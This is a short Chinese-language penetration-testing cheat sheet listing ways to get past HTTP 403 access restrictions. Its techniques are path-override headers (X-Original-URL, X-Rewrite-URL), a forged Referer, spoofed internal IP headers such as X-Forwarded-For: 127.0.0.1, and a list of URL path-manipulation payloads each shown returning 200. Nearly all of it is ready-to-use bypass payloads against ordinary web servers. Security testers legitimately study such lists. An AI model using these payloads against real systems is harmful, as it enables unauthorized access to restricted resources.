1、请求覆盖绕过
-
可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url中的路径,尝试绕过对更高级别的缓存和web服务器的限制
-
Request GET /ylaq/Good HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /ylaq/Good Response HTTP/1.1 200 OK
2、Referer表头绕过
-
可以通过更改Referer来绕过不严谨的服务端验证
-
Request GET /ylaq/Good HTTP/1.1 Host: xxx Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 Host: xxx ReFerer:https://xxx/ylaq/Good Response HTTP/1.1 200 OK
3、代理ip
-
在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。
-
X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Host: 127.0.0.1
4、请求路径绕过
-
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。
-
ylaq.com/Good => 403 ylaq.com/Good/ => 200 ylaq.com/Good// => 200 ylaq.com//Good// => 200 ylaq.com/Good/* => 200 ylaq.com/Good/*/ => 200 ylaq.com/Good/. => 200 ylaq.com/Good/./ => 200 ylaq.com/./Good/./ => 200 ylaq.com/Good/./. => 200 ylaq.com/Good/./. => 200 ylaq.com/Good? => 200 ylaq.com/Good?? => 200 ylaq.com/Good??? => 200 ylaq.com/Good..;/ => 200 ylaq.com/Good/..;/ => 200 ylaq.com/%2f/Good => 200 ylaq.com/%2e/Good => 200 ylaq.com/Good%20/ => 200 ylaq.com/Good%09/ => 200 ylaq.com/%20Good%20/ => 200